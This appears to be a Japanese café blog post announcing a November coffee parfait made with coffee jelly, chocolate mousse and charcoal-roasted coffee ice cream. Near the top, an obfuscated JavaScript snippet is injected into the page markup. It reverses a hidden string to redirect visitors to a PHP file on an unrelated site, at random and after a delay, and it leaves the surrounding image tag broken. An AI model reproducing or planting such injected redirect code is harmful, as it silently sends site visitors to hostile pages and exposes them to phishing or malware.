ミッシュハウスからのお知らせ

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);} class=”size-full wp-image-2982″ src=”https://www.missu-house.com/wp-content/uploads/2019/10/DSC05018_R.jpg” alt=”” width=”918″ height=”611″ />

こんにちは☆

ミッシュハウス伏見本店です。

11月になりすっかり山も紅葉してきまして、秋から冬へと着々と近づいていますね。

寒いのも雪も嫌ですが・・・でも北海道に住んでいる以上仕方ないですね。。

さて、11月のパフェは、「炭焼珈琲パフェ」です。

当店のスタッフが炭焼珈琲のアイスが大好きで、パフェをやろうという話になり、出来上がりました♪

内容はすごくシンプルです。

苦めの珈琲ゼリーにまろやかなチョコムース、炭焼珈琲アイスとソフトクリームを合わせました。

炭焼珈琲アイスが結構な珈琲感なので、中身はシンプルに口の中でぶつかり合わないように作りました(^^;)

珈琲好きの方にはぜひ食べていただきたいです!

皆様のご来店心よりお待ちしております(^v^)

 

 

コメント

  1. この記事へのコメントはありません。

  1. この記事へのトラックバックはありません。